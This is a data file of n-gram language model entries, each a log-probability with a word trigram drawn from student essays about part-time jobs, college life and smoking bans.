-0.5508023 Although part-time job
-0.5508023 appropriate part-time job
-0.5508023 located part-time job
-0.34320134 a full-time job
-1.9574244 for the job
-1.4286005 be the job
-1.9329262 in the job
-1.7634121 of the job
-0.93096656 do the job
-1.1943283 get the job
-0.93096656 keep the job
-0.93096656 harder the job
-0.8704682 in any job
-1.089122 or any job
-1.4195447 type of job
-1.6226106 kind of job
-0.9679123 translate to job
-2.363676 of their job
-0.25140214 part time job
-1.673732 full time job
-0.9007268 any available job
-0.94985986 do one job
-1.3828673 one 's job
-0.8588519 today 's job
-1.4148422 a career job
-1.4871591 <s> Part-time job
-2.486466 a part job
-0.5394636 carefully selecting job
-1.689819 the same job
-0.7735984 their first job
-0.85916185 your first job
-1.1118029 a good job
-0.91738397 increasing your job
-0.94946533 realize what job
-1.2931173 a real job
-1.7496572 real world job
-1.0415673 a particular job
-0.9065895 , against job
-0.7743107 the simple job
-0.8728603 lose her job
-0.77365947 A research job
-1.1673927 for this is
-0.8032141 , this is
-0.9380627 and this is
-0.9380627 but this is
-0.7730598 why this is
-0.2349328 that it is
-0.5708096 student it is
-0.3123905 , it is
-0.7451785 and it is
-0.32978565 as it is
-0.5708096 students it is
-0.6668576 if it is
-0.5014664 but it is
-0.5708096 agree it is
-0.5708096 However it is
-0.77837354 what it is
-0.3906384 because it is
-0.5708096 them it is
-0.70425487 If it is
-0.5708096 whatever it is
-0.3294959 how it is
-0.16911975 believe it is
-0.6668576 feel it is
-0.15740287 think it is
-0.5708096 knows it is
-0.5708096 ... it is
-0.5708096 opinion it is
-0.5708096 Although it is
-0.8915361 job that is
-0.8130382 nature that is
-0.8130382 school that is
-0.9978403 work that is
-1.3598235 agree that is
-0.8130382 environment that is
-0.8130382 food that is
-0.8130382 relationships that is
-0.8130382 all that is
-0.8130382 club that is
-0.8130382 force that is
-0.8130382 cogitation that is
-1.780805 a job is
-1.1376543 part-time job is
-1.606921 time job is
-0.7926138 a student is
-1.2827873 the student is
-1.4707285 college student is
-0.8607828 rounded student is
-1.365294 job , is
-1.5570047 student , is
-1.743601 time , is
-1.6351857 work , is
-1.1817294 others , is
-1.407212 activities , is
-1.5189708 however , is
-0.92405105 obvious , is
-0.92405105 firstly , is
-1.5458007 or not is
-1.6212186 time and is
-1.3467845 their study is
-0.88333553 , studying is
-0.88333553 are studying is
-0.7441733 while studying is
-0.73489785 spent studying is
-0.9082485 Such experience is
-1.1535352 college experience is
-1.5482816 that working is
-0.8347286 a restaurant is
-1.0185652 the restaurant is
-0.4379831 While there is
-0.43895334 , there is
-0.4379831 as there is
-0.50659114 but there is
-0.4379831 However there is
-0.4379831 If there is
-0.4379831 Firstly there is
-0.4379831 feel there is
-0.4379831 think there is
-0.14602639 first reason is
-0.86209184 second reason is
-0.71969813 obvious reason is
-2.4764078 college students is
-1.1949867 from studies is
-1.2425061 a time is
-1.2139168 , time is
-1.247492 their time is
-1.9624256 part time is
-0.8116826 your time is
-0.9957675 much time is
-0.8116826 in-class time is
-0.8116826 His time is
-1.5357331 part-time jobs is
-1.842247 time jobs is
-0.9341389 no one is
-1.1227734 , school is
-1.1227734 to school is
-0.9496205 such work is
-0.864055 world f is
-0.9242996 choice but is
-1.464019 not only is
-0.87759566 Not only is
-1.442007 is necessary is
-1.2141523 , college is
-1.1866114 in college is
-0.8606727 ; college is
-1.4959836 after college is
-1.2795157 during college is
-0.5035019 <s> Time is
-0.9109033 extra money is
-0.8821976 Extra money is
-1.108703 prize money is
-1.4986432 , so is
-1.9099857 , or is
-0.53057814 Another option is
-1.3366545 to consider is
-0.9406554 also important is
-0.9328752 worker who is
-0.89885783 This environment is
-0.84503543 <s> There is
-1.1244345 , food is
-0.8205782 The alternative is
-0.61668825 <s> This is
-0.8544151 f. This is
-0.69736004 <s> College is
-0.71964127 , College is
-0.5776416 your major is
-1.1546215 the classes is
-0.4986766 , what is
-1.29677 of what is
-0.824929 out what is
-1.1551659 they provide is
-0.6104731 Japanese society is
-1.1854899 have done is
-0.97827387 this area is
-0.8251142 high grades is
-0.3978547 <s> It is
-1.1677258 these activities is
-1.1686045 , how is
-0.80614805 student life is
-0.9107202 in life is
-0.80614805 university life is
-0.9873396 his life is
-0.855516 for graduates is
-1.2335917 credit cards is
-0.8976511 the income is
-0.43953854 , which is
-0.33175752 of which is
-0.5762516 doing which is
-0.5762516 world which is
-0.5762516 system which is
-0.5762516 week which is
-0.5762516 smoking which is
-1.5117768 living expenses is
-0.9020047 Japanese family is
-1.0164603 this period is
-0.864055 independent adult is
-0.790864 this way is
-0.790864 no way is
-0.8407997 last factor is
-0.54310596 the situation is
-0.54310596 This situation is
-1.3806108 of education is
-1.0885909 college education is
-1.6492549 real world is
-0.88097453 achieve success is
-0.842589 working provides is
-0.80015355 because training is
-0.85366726 labor cost is
-0.7960297 <s> That is
-0.68939555 this question is
-0.68939555 fs effectiveness is
-0.864055 go someone is
-1.7761021 to learn is
-1.3963182 too much is
-1.0621008 the problem is
-0.85710216 this change is
-0.7585329 work concerned is
-0.9859127 work ethics is
-0.53057814 <s> Suffering is
-1.0410795 simple tasks is
-0.7977212 menial labor is
-0.53057814 But timing is
-0.9011831 <s> Japan is
-1.0749522 main purpose is
-0.53057814 serving burgers is
-1.7563766 I think is
-0.864055 has made is
-0.68939555 Not everyone is
-0.7977212 Every hour is
-0.7895019 free day is
-0.7895019 whose day is
-0.68939555 with coworkers is
-0.8230523 their homework is
-0.53057814 and dinner is
-0.53057814 the contrary is
-0.8251142 where drinking is
-0.37824222 final point is
-0.6983885 My point is
-0.740988 or she is
-0.5975189 If she is
-0.92422605 my opinion is
-0.53057814 <s> Studying is
-0.54310596 graduation careers is
-0.63256115 their careers is
-0.53057814 <s> School is
-0.53057814 that profession is
-0.8407997 If everything is
-0.9859127 a resume is
-0.53057814 statement eIt is
-0.8230523 The goal is
-0.7977212 class schedule is
-0.9859127 after graduating is
-0.68939555 real challenge is
-0.53057814 place cwhich is
-0.68939555 a burger is
-0.90803343 their health is
-0.8230523 their mind is
-0.53057814 the academics is
-0.53057814 <s> Failure is
-0.53057814 the administration is
-0.31225985 <s> Money is
-0.53057814 <s> Communication is
-1.5232872 in restaurants is
-0.53057814 glittering bounty is
-0.53057814 for enlightenment is
-0.53057814 The onus is
-0.7977212 problem here is
-1.1787051 that smoking is
-0.7853301 , smoking is
-0.5520076 ban smoking is
-0.97326475 second-hand smoke is
-0.75099576 tobacco smoke is
-0.53525615 Tobacco smoke is
-0.53057814 the premise is
-0.53057814 the employee is
-2.0926883 will be valuable
-1.8213264 be a valuable
-0.9416316 job a valuable
-2.025607 is a valuable
-1.4630669 gain a valuable
-1.4630669 also a valuable
-1.9092273 job is valuable
-1.2500579 Time is valuable
-1.0028375 to acquire valuable
-0.915174 students many valuable
-0.915174 them many valuable
-1.6528096 lot of valuable
-1.2254099 a very valuable
-1.3246421 are very valuable
-1.1837755 very little valuable
-1.1676499 can gain valuable
-1.4337367 give students valuable
-0.94152975 a -LRB- valuable
-2.4775994 to have valuable
-1.5177169 teaches them valuable
-1.4262344 jobs provide valuable
-1.2076858 can make valuable
-0.54052097 school builds valuable
-1.2122566 is valuable preparation
-1.5653945 experience and preparation
-1.2166305 is good preparation
-0.70534635 provide effective preparation
-1.5680081 with a full-time
-1.6587732 for a full-time
-1.7475666 is a full-time
-1.2768748 not a full-time
-1.4129009 are a full-time
-1.1510258 taking a full-time
-1.7085097 get a full-time
-1.3035802 finding a full-time
-1.3807868 getting a full-time
-1.3567858 becoming a full-time
-1.9482578 work and full-time
-0.96484303 opportunities of full-time
-1.2586243 responsibilities of full-time
-1.6492419 while studying full-time
-1.5482255 or even full-time
-0.7050885 start formal full-time
-0.78560084 , with the
-0.734856 and with the
-0.77892387 students with the
-0.42973036 agree with the
-0.69485074 relationships with the
-0.734856 help with the
-0.69485074 do with the
-0.338656 life with the
-0.5931033 day with the
-0.5931033 interacting with the
-0.5931033 helping with the
-0.5931033 habits with the
-0.5931033 interferes with the
-0.5931033 trapped with the
-0.5931033 interfering with the
-0.5931033 burdened with the
-0.5931033 coupled with the
-0.5931033 rests with the
-0.5931033 entangled with the
-0.6055535 <s> for the
-0.49505532 statement for the
-0.7745824 job for the
-0.7745824 preparation for the
-0.9647335 , for the
-0.7745824 working for the
-0.83685935 time for the
-0.83965427 pay for the
-0.34365147 bad for the
-0.6055535 history for the
-0.7106483 better for the
-0.6055535 skills for the
-0.6055535 issue for the
-0.7106483 need for the
-0.5267676 good for the
-0.6055535 do for the
-0.49505532 them for the
-0.6055535 unprepared for the
-0.75220877 responsible for the
-0.6055535 '' for the
-0.6055535 great for the
-0.6055535 matter for the
-0.6055535 Working for the
-0.6055535 traverse for the
-0.6055535 paying for the
-0.75220877 responsibility for the
-0.6055535 budget for the
-0.6055535 distraction for the
-0.6055535 save for the
-0.6055535 policy for the
-0.34365147 prepare for the
-0.6055535 prepared for the
-0.6055535 empathy for the
-0.6055535 loan for the
-0.6055535 low for the
-0.6055535 dogs for the
-0.6055535 chances for the
-1.0766768 <s> While the
-1.1211412 may be the
-1.7521027 should be the
-0.90107536 just be the
-0.9709294 argued that the
-1.2245541 job that the
-1.2437248 is that the
-1.2596142 , that the
-0.7952663 being that the
-0.7952663 enough that the
-1.135978 believe that the
-0.7952663 aware that the
-1.1742799 think that the
-1.049854 realize that the
-0.7952663 said that the
-0.7952663 media that the
-0.7952663 Assuming that the
-1.6814873 the job the
-1.2672942 , is the
-1.3552619 there is the
-0.8574259 reason is the
-0.8167592 studies is the
-1.1961966 college is the
-0.8167592 so is the
-1.3191751 This is the
-1.1726029 what is the
-1.3632811 It is the
-1.1726029 life is the
-0.8167592 factor is the
-1.003548 situation is the
-0.8167592 Studying is the
-0.8167592 enlightenment is the
-1.9053354 a student the
-1.8473952 the student the
-0.7857646 not acquire the
-0.81018215 it , the
-0.9934771 that , the
-1.123291 job , the
-1.1976409 student , the
-0.9934771 often , the
-1.2986002 example , the
-0.86197114 students , the
-1.2784339 time , the
-0.9934771 such , the
-1.2347344 -RRB- , the
-0.9934771 then , the
-1.2499646 college , the
-0.81018215 portals , the
-0.81018215 Primarily , the
-1.180603 skills , the
-0.9700261 However , the
-1.1578201 classes , the
-1.0770386 all , the
-0.8398835 life , the
-0.9934771 responsibilities , the
-0.9700261 Firstly , the
-0.81018215 prospects , the
-1.180603 however , the
-1.125741 addition , the
-0.9934771 years , the
-0.81018215 moreover , the
-0.81018215 perhaps , the
-0.81018215 mentioned , the
-1.125741 hand , the
-1.0770386 Thus , the
-1.0770386 Furthermore , the
-1.2721753 Finally , the
-0.81018215 Ultimately , the
-0.81018215 accounts , the
-0.81018215 accommodation , the
-0.81018215 luck , the
-0.81018215 nonetheless , the
-1.1399924 Too often the
-1.6641804 is not the
-0.91638875 often not the
-1.1014981 <s> In the
-0.7241692 obtained by the
-0.61613256 up by the
-0.61613256 higher by the
-0.61613256 But by the
-0.61613256 made by the
-0.61613256 abide by the
-0.61613256 thin by the
-0.34782895 offered by the
-0.61613256 dashed by the
-0.9060609 , in the
-0.76231086 employment in the
-0.6455818 obtained in the
-0.89339256 and in the
-0.42620766 experience in the
-0.7600345 students in the
-0.8864258 engage in the
-0.6455818 studies in the
-0.70112026 time in the
-0.8511636 jobs in the
-0.6455818 school in the
-0.9376454 work in the
-0.6455818 but in the
-0.6455818 necessary in the
-0.6455818 college in the
-0.6455818 appear in the
-0.6455818 internships in the
-0.6455818 gaps in the
-0.76231086 better in the
-0.6455818 important in the
-0.76231086 learned in the
-0.6455818 like in the
-0.80941606 people in the
-0.76231086 help in the
-0.6455818 function in the
-0.76231086 get in the
-0.6455818 '' in the
-0.6455818 place in the
-0.76231086 Working in the
-0.6455818 harder in the
-0.6455818 hours in the
-0.6455818 both in the
-0.6455818 hierarchies in the
-0.6455818 reports in the
-0.6455818 live in the
-0.6455818 exist in the
-0.6455818 dancing in the
-0.6455818 tobacco in the
-1.1710322 the field the
-1.0918549 student and the
-1.1979501 , and the
-0.818134 employment and the
-1.0918549 study and the
-1.1423497 experience and the
-1.2173085 studies and the
-0.9468625 work and the
-1.0056634 -LRB- and the
-1.3268399 money and the
-0.818134 itself and the
-0.818134 factor and the
-1.0056634 government and the
-0.818134 law and the
-0.818134 independence and the
-1.0056634 clubs and the
-0.818134 classroom and the
-0.818134 interviews and the
-0.818134 paycheck and the
-0.818134 dollar and the
-0.818134 warnings and the
-0.7155632 job of the
-0.1756275 many of the
-0.57808876 experience of the
-0.45903027 one of the
-0.7576203 quality of the
-0.3086364 some of the
-0.45903027 most of the
-0.6094073 Most of the
-0.31178153 part of the
-0.6094073 foundation of the
-0.40940017 understanding of the
-0.7802819 knowledge of the
-0.6094073 environment of the
-0.7155632 issue of the
-0.6094073 Many of the
-0.34518042 parents of the
-0.8376671 all of the
-0.7155632 because of the
-0.6094073 unworthy of the
-0.79446906 lot of the
-0.6094073 reality of the
-0.6094073 aware of the
-0.6094073 expenses of the
-0.5295398 development of the
-0.7155632 ability of the
-0.79446906 sense of the
-0.82563585 world of the
-0.45903027 concept of the
-1.0122551 cost of the
-0.84292716 out of the
-0.6094073 relevance of the
-0.80419135 outside of the
-0.34518042 much of the
-0.6094073 problem of the
-0.6094073 workplace of the
-0.6094073 confines of the
-1.0075617 rest of the
-0.6094073 delights of the
-0.6094073 Students of the
-0.7576203 responsibility of the
-0.6094073 applications of the
-0.7802819 members of the
-0.6094073 rules of the
-0.79446906 kind of the
-0.6094073 dynamics of the
-0.6094073 side of the
-0.6094073 destiny of the
-0.6094073 abuse of the
-0.34518042 sight of the
-0.6094073 corners of the
-0.34518042 appreciation of the
-0.7576203 care of the
-0.6094073 possession of the
-0.7155632 One of the
-0.6094073 security of the
-0.6094073 beginning of the
-0.6623005 health of the
-0.7155632 pursuit of the
-0.6094073 none of the
-0.6094073 sufferers of the
-0.6094073 interference of the
-0.6094073 despite of the
-0.6094073 infringement of the
-0.6094073 smell of the
-0.9903222 it to the
-0.9903222 job to the
-1.1277498 , to the
-1.4303834 students to the
-0.7053112 related to the
-1.0452139 benefits to the
-0.9207419 more to the
-0.7611397 attractive to the
-1.136093 important to the
-0.9207419 themselves to the
-0.7611397 food to the
-0.39905858 useful to the
-0.9207419 get to the
-0.9903222 up to the
-0.9207419 regard to the
-0.7611397 education to the
-0.7611397 world to the
-0.7611397 campus to the
-0.7611397 interests to the
-0.7611397 pertaining to the
-0.7611397 relation to the
-0.39905858 relative to the
-0.6502585 addition to the
-0.7611397 herself to the
-0.9207419 getting to the
-0.7611397 further to the
-0.7611397 stability to the
-0.7611397 respect to the
-0.7611397 bring to the
-0.7611397 suited to the
-0.7611397 merit to the
-0.7611397 Looking to the
-0.9207419 goes to the
-0.7611397 adjust to the
-0.7611397 shock to the
-0.7611397 applied to the
-1.0297949 due to the
-0.7611397 introduced to the
-0.7611397 offered to the
-0.7611397 thrown to the
-0.7611397 distracting to the
-0.7611397 attracted to the
-0.9207419 opposed to the
-0.7611397 safe-guarded to the
-0.7611397 approach to the
-0.7611397 justification to the
-0.7611397 insult to the
-1.4370754 <s> For the
-0.7857646 and engineering the
-1.425126 to experience the
-0.8832106 students gain the
-0.65722644 student from the
-0.65722644 but from the
-0.7776103 money from the
-0.7776103 benefit from the
-0.7776103 borrowed from the
-0.68857145 away from the
-0.48605403 transition from the
-0.65722644 scholarships from the
-0.7776103 escape from the
-0.65722644 view from the
-0.65722644 hide from the
-1.5586927 such as the
-0.9736256 well as the
-0.89750665 manageable as the
-1.5602933 of students the
-0.6360376 be on the
-0.67076755 job on the
-0.31974578 , on the
-0.54593325 not on the
-0.6360376 work on the
-0.54593325 are on the
-0.54593325 strains on the
-0.54593325 strongly on the
-0.54593325 depends on the
-0.42118168 impact on the
-0.54593325 determination on the
-0.6892329 based on the
-0.6360376 concentrate on the
-0.54593325 role on the
-0.6360376 effect on the
-0.67076755 rely on the
-0.6360376 Depending on the
-0.54593325 Or on the
-0.54593325 expense on the
-0.54593325 strain on the
-0.31894603 Based on the
-0.54593325 Queens on the
-0.8090081 ban on the
-1.0516962 is also the
-1.7538673 the time the
-1.1549811 even if the
-0.8240756 But if the
-0.8240756 determine if the
-1.5754697 , then the
-1.3415871 , but the
-1.0069131 to pay the
-1.0924603 help pay the
-1.0086755 will have the
-1.0495377 not have the
-1.7214205 to have the
-1.2299025 students have the
-1.3222961 should have the
-1.247029 they have the
-0.7971681 workers have the
-0.7971681 hardly have the
-1.5069013 <s> And the
-0.920691 teach some the
-1.4537649 , so the
-1.108885 to : the
-1.4287155 <s> To the
-1.4710581 has become the
-1.6894344 , or the
-0.9084117 employees or the
-1.1421975 and even the
-0.8442111 fulfill even the
-1.1459138 job are the
-1.4763844 They are the
-0.9038995 children are the
-0.709266 may offer the
-0.709266 They offer the
-0.52407384 employment lays the
-0.7857646 weigh carefully the
-0.43407604 to consider the
-0.66309506 must consider the
-1.3477215 <s> By the
-0.7162568 experience makes the
-0.7162568 It makes the
-0.8545207 background helps the
-0.4851436 with understanding the
-0.4851436 for understanding the
-0.4851436 as understanding the
-0.8079847 <s> Besides the
-0.8196111 time through the
-0.8196111 gained through the
-0.55972874 themselves into the
-0.55972874 late into the
-0.653077 insight into the
-0.55972874 assimilation into the
-0.55972874 toes into the
-0.55972874 women into the
-0.53586376 could increase the
-0.53586376 never increase the
-0.560826 part-time at the
-0.43026197 study at the
-0.71008927 work at the
-0.560826 then at the
-0.560826 degree at the
-0.560826 abilities at the
-0.560826 all at the
-0.560826 days at the
-0.560826 needed at the
-0.560826 perform at the
-0.560826 mesmerized at the
-0.560826 winning at the
-0.560826 Troubles at the
-0.560826 smoke at the
-0.52407384 <s> Saving the
-0.85015655 them put the
-1.0403702 to see the
-0.6800502 fre putting the
-1.3577589 can help the
-1.3333353 will help the
-0.8878894 is when the
-0.8878894 time when the
-1.8613932 to do the
-0.81229526 they take the
-0.81229526 would take the
-0.72796875 can use the
-0.72796875 must use the
-1.1329075 for classes the
-1.4412572 of what the
-0.87582356 tell what the
-1.0116953 In conclusion the
-0.7665813 For all the
-0.92862236 from all the
-0.7665813 tired all the
-0.7665813 explore all the
-0.7665813 understand all the
-0.9157402 , because the
-0.8240432 give them the
-1.056014 , therefore the
-1.7402424 <s> If the
-1.3468446 can get the
-1.4565918 to get the
-0.42525458 will teach the
-0.9074033 knew how the
-0.8633423 takes away the
-1.0192885 will give the
-0.8754517 to give the
-1.4036587 there fs the
-0.51832384 through entering the
-0.51832384 transition entering the
-0.51832384 postpone entering the
-0.82929325 make up the
-0.6958216 weigh up the
-0.6958216 setting up the
-0.6958216 speed up the
-1.0292808 to make the
-1.0241084 should make the
-0.5890107 in which the
-0.8667015 against which the
-0.52407384 usually restrict the
-0.9943956 job during the
-0.62023175 wastes during the
-0.62023175 element during the
-0.62023175 unproductive during the
-0.90131474 is rarely the
-0.88746697 give customers the
-1.0741897 to enjoy the
-0.9123231 really enjoy the
-0.8303721 college provides the
-0.9937909 will improve the
-0.8523332 n't place the
-0.8728262 would were the
-1.1107861 , where the
-0.8281111 environments where the
-1.480279 to find the
-1.1906312 to explore the
-0.8875898 enough without the
-0.8780043 is about the
-0.7311033 part about the
-0.7311033 thinking about the
-0.33377156 to overlook the
-0.33377156 would overlook the
-0.80146855 I support the
-0.80146855 do support the
-0.747595 not keep the
-0.4575826 and ease the
-0.5296353 help ease the
-0.8452107 can learn the
-0.8425536 to learn the
-0.8452107 also learn the
-0.66980684 better learn the
-0.8452107 must learn the
-0.664711 should let the
-0.664711 And let the
-0.8996507 problems than the
-0.8079847 <s> Despite the
-0.87345314 to enter the
-0.87345314 they enter the
-1.077419 to manage the
-0.4575826 lying beyond the
-0.4575826 worlds beyond the
-0.583285 skills outside the
-0.583285 learned outside the
-0.583285 life outside the
-1.2179445 to meet the
-0.30696866 be against the
-0.30696866 completely against the
-0.30696866 's against the
-0.25972024 am against the
-0.30696866 considered against the
-0.30696866 smoke against the
-0.7857646 heavy load the
-0.84035224 way until the
-1.4533409 to go the
-0.9741635 student needs the
-0.71465766 really needs the
-0.47637358 to understand the
-0.41205218 students understand the
-0.47637358 better understand the
-0.41205218 would understand the
-0.41205218 fully understand the
-0.52407384 for maturing the
-0.8264364 they lack the
-0.9937909 and allow the
-1.2033625 not always the
-0.8599074 approach since the
-0.664711 may change the
-0.664711 easily change the
-1.4025711 the workplace the
-0.6884598 ground between the
-0.6884598 divided between the
-0.81038797 that hold the
-0.90131474 to sample the
-0.8925224 parents want the
-0.747595 , hopefully the
-0.38091126 to appreciate the
-0.48211288 students appreciate the
-0.48211288 better appreciate the
-0.7857646 the harder the
-0.85015655 have made the
-0.50672495 to reduce the
-0.43809736 help reduce the
-0.43809736 significantly reduce the
-0.747595 they reach the
-0.8660633 study week the
-0.90131474 may cause the
-0.85015655 for both the
-0.33377156 can enrich the
-0.33377156 greatly enrich the
-1.077419 and ultimately the
-0.96760607 to fulfill the
-0.52407384 will motivate the
-0.82761496 places around the
-0.52407384 will familiarize the
-0.4575826 in choosing the
-0.4575826 By choosing the
-0.8079847 <s> Taking the
-1.3245189 <s> Even the
-0.52407384 be assured the
-0.4575826 independence among the
-0.4575826 resistance among the
-0.36989835 <s> On the
-1.0766768 <s> Although the
-0.52407384 -RRB- attain the
-0.8642653 must balance the
-0.96760607 <s> Balancing the
-0.83314687 should assist the
-0.6800502 to recognize the
-0.6800502 , experiencing the
-0.7857646 particularly towards the
-0.8264364 feedback form the
-0.90131474 to receive the
-0.82761496 for everything the
-1.0766768 <s> With the
-0.6241794 <s> At the
-1.0116953 <s> Also the
-0.8135694 smoking within the
-1.0329242 to cover the
-0.30938736 , reducing the
-0.747595 to buy the
-0.52407384 thereby reviving the
-0.6800502 savings onto the
-0.52407384 eventually breakdown the
-0.747595 , leaving the
-0.52407384 student selected the
-0.52407384 in discovering the
-0.96760607 be taught the
-0.52407384 to join the
-0.52407384 work restricts the
-0.52407384 generally leaves the
-0.52407384 helps defray the
-0.4575826 for probably the
-0.4575826 , probably the
-0.8079847 , namely the
-0.81038797 my mind the
-0.6800502 will miss the
-0.52407384 studies lay the
-0.6800502 earned versus the
-0.6800502 ultimately win the
-0.52407384 to invest the
-0.52407384 student appreciates the
-0.52407384 who extol the
-0.52407384 hour digesting the
-0.52407384 purchases disturbs the
-0.52407384 by saddling the
-0.6800502 is merely the
-0.52407384 and hamstring the
-0.52407384 his wife the
-0.6800502 graduated near the
-0.52407384 and running the
-0.90131474 is nonetheless the
-0.6800502 Putting aside the
-0.52407384 this negates the
-0.52407384 would represent the
-0.52407384 in considering the
-0.52407384 <s> Inside the
-0.52407384 are affecting the
-0.52407384 it alters the
-0.52407384 that concerning the
-0.52407384 to promote the
-0.9553065 upon this student
-1.2661562 for a student
-0.8009644 can a student
-1.2314777 that a student
-1.3171282 is a student
-1.1520282 , a student
-0.55941105 by a student
-1.3329911 in a student
-1.1668518 of a student
-0.99516034 to a student
-1.2786714 as a student
-0.9794965 being a student
-0.2896474 if a student
-1.1375568 such a student
-1.1068897 into a student
-0.22592244 If a student
-0.8009644 still a student
-0.9794965 lead a student
-0.8009644 once a student
-0.8009644 force a student
-0.8009644 improve a student
-0.8009644 giving a student
-0.8009644 When a student
-0.8009644 seeing a student
-0.8009644 gauge a student
-0.8009644 challenge a student
-0.8009644 deter a student
-0.8009644 Obliging a student
-0.8237419 <s> the student
-1.2912413 for the student
-0.68202734 that the student
-1.129515 , the student
-0.954006 by the student
-1.2672464 in the student
-0.8237419 field the student
-1.18418 of the student
-1.2732176 to the student
-1.302538 from the student
-1.0382692 on the student
-0.8237419 time the student
-1.1024476 if the student
-1.1024476 pay the student
-1.0143301 makes the student
-0.8237419 helps the student
-0.41787416 help the student
-1.0143301 take the student
-0.41787416 teach the student
-0.8237419 away the student
-0.41787416 give the student
-0.56994617 which the student
-0.8237419 restrict the student
-1.25734 against the student
-1.0143301 change the student
-0.8237419 hopefully the student
-0.8237419 cause the student
-0.8237419 both the student
-0.8237419 motivate the student
-0.8237419 familiarize the student
-0.8237419 disturbs the student
-1.2609558 cards , student
-1.4310304 Furthermore , student
-0.8711163 by any student
-1.0901948 of any student
-0.8149672 an engineering student
-2.2307382 <s> The student
-1.9714158 for college student
-0.25378907 a college student
-0.8020794 full-time college student
-0.83188283 the college student
-0.8020794 any college student
-0.8020794 or college student
-0.8020794 when college student
-0.8020794 young college student
-0.859884 more productive student
-0.8926364 this same student
-1.7827749 <s> A student
-0.702775 can contribute student
-0.5398157 <s> Each student
-1.5051687 in my student
-0.9398239 well rounded student
-0.8103189 the individual student
-0.5105843 <s> Every student
-0.702775 The modern student
-0.5398157 government sponsored student
-0.5398157 the cloistered student
-0.5398157 a first-year student
-0.5398157 the questing student
-0.5398157 A high-school student
-0.5398157 financially strapped student
-2.0774298 , I will
-0.9402039 U.S. I will
-0.9169818 job this will
-1.1690172 and this will
-0.9586263 there it will
-0.6990433 experience that will
-0.8688624 f that will
-0.8688624 skill that will
-1.3294083 skills that will
-1.1926079 life that will
-0.8688624 responsibilities that will
-0.8688624 lesson that will
-0.8688624 problems that will
-1.5518652 part-time job will
-2.1632748 time job will
-1.8643875 a student will
-1.3702692 the student will
-1.6579925 college student will
-1.9851167 time , will
-0.95400727 produce , will
-1.2375623 expectations , will
-1.2375623 instance , will
-0.94722396 But many will
-1.598336 life and will
-0.9566347 debt and will
-1.5301561 of course will
-1.0375855 work experience will
-1.582016 , there will
-1.0921868 but there will
-1.5951837 that students will
-0.75647396 the students will
-1.7013508 , students will
-0.9055203 working students will
-2.0443506 college students will
-1.5117801 their studies will
-2.7215285 part time will
-1.2753175 time jobs will
-1.2594568 Part-time jobs will
-0.8403157 part jobs will
-0.8403157 all jobs will
-0.9136081 their focus will
-1.835027 part-time work will
-1.3702801 and work will
-1.7692668 in college will
-1.6385278 of college will
-0.9561792 at college will
-1.7194924 extra money will
-1.0735996 that they will
-0.76402617 job they will
-1.004603 , they will
-1.1029477 and they will
-0.76402617 studying they will
-1.128304 as they will
-0.76402617 college they will
-1.0791597 money they will
-1.1918464 what they will
-0.3999682 world they will
-0.7020288 where they will
-0.9952262 Maybe they will
-1.4668181 , you will
-0.92240727 whose career will
-0.7467361 that employers will
-0.7467361 Potential employers will
-1.386025 Such skills will
-0.8360971 skills developed will
-0.8801311 part-time position will
-1.9734569 <s> There will
-1.8830712 young people will
-0.8940015 <s> They will
-0.8543972 all eventually will
-1.200639 <s> This will
-1.2204936 to what will
-1.2129856 and therefore will
-0.69894636 might produce will
-2.024976 <s> It will
-1.7669585 in life will
-0.9121253 added income will
-0.9422459 money which will
-0.9450191 fs education will
-1.2069107 working world will
-0.8686315 large universities will
-0.90941113 a workplace will
-0.8867227 poorer families will
-1.005025 <s> Others will
-1.4199708 college days will
-0.90547687 not he will
-0.5371813 filing correspondence will
-0.81104904 these possibilities will
-0.76975334 and hierarchies will
-0.8981023 then we will
-0.8981023 College we will
-0.5371813 social rejection will
-0.5371813 , he\/she will
-1.686524 all restaurants will
-1.6374048 student will acquire
-2.0991783 do not acquire
-0.96771485 ways to acquire
-2.0046606 order to acquire
-0.9649013 take it upon
-1.7082255 full-time job upon
-0.81729704 will acquire upon
-0.81729704 same organization upon
-0.88694775 is therefore upon
-0.5410506 lifestyle adjustment upon
-1.4133127 , however upon
-0.5410506 computer programmer upon
-0.5410506 his\/her reliance upon
-0.5410506 rarely relied upon
-0.36178198 job upon graduation
-0.36178198 acquire upon graduation
-0.36178198 organization upon graduation
-0.36178198 adjustment upon graduation
-0.36178198 programmer upon graduation
-1.7917953 for their graduation
-2.0014944 to their graduation
-0.9453723 after their graduation
-1.1327 world following graduation
-0.69363415 time after graduation
-0.59214056 offer after graduation
-0.69363415 opportunities after graduation
-0.59214056 them after graduation
-0.59214056 life after graduation
-0.69363415 until after graduation
-1.1000702 or her graduation
-0.7050885 car post graduation
-0.9058509 begin with ,
-0.8545582 from this ,
-0.8545582 doing this ,
-1.1336588 this statement ,
-0.91844374 begging for ,
-1.1542828 several reasons ,
-1.0673444 two reasons ,
-0.7124748 these reasons ,
-0.38603947 above reasons ,
-0.9084074 know it ,
-1.2827783 to that ,
-1.1554365 than that ,
-1.3891904 working part-time ,
-1.137892 Working part-time ,
-1.1770948 a job ,
-0.9923402 part-time job ,
-0.9567024 any job ,
-0.8362206 time job ,
-0.7857207 career job ,
-0.7857207 selecting job ,
-0.7857207 real job ,
-1.6827123 it is ,
-0.90611964 health is ,
-1.39528 a student ,
-1.3101169 the student ,
-0.7700374 engineering student ,
-1.0378609 college student ,
-0.7700374 first-year student ,
-0.7700374 strapped student ,
-0.7780443 upon graduation ,
-0.794649 Quite often ,
-0.794649 More often ,
-1.4297211 can not ,
-1.5709324 do not ,
-0.79624313 this case ,
-0.7424424 many cases ,
-0.6329169 some cases ,
-0.6303149 extreme cases ,
-1.0964175 Part-time employment ,
-1.7400442 job in ,
-1.1396223 a field ,
-0.59873474 ; and ,
-0.88957345 family and ,
-0.88957345 companies and ,
-0.9184125 enough of ,
-0.571 by nature ,
-0.571 very nature ,
-1.1809547 tend to ,
-0.5351902 of course ,
-0.98334783 Of course ,
-0.75446147 , study ,
-1.322278 of study ,
-0.97906196 their study ,
-0.75446147 beyond study ,
-0.7946591 for example ,
-0.069481574 For example ,
-0.7717589 with studying ,
-1.0084783 on studying ,
-0.7717589 spend studying ,
-1.047094 very little ,
-1.4130744 the experience ,
-0.7812811 While working ,
-1.0250342 by working ,
-0.7812811 either working ,
-0.7812811 always working ,
-0.7812811 week working ,
-0.8929926 a restaurant ,
-0.2250479 <s> Moreover ,
-0.7005471 this reason ,
-0.8988212 the students ,
-0.8129096 many students ,
-1.0267082 school students ,
-1.1749005 college students ,
-1.2612681 some students ,
-1.2612681 most students ,
-1.0267082 expose students ,
-0.83168256 busy students ,
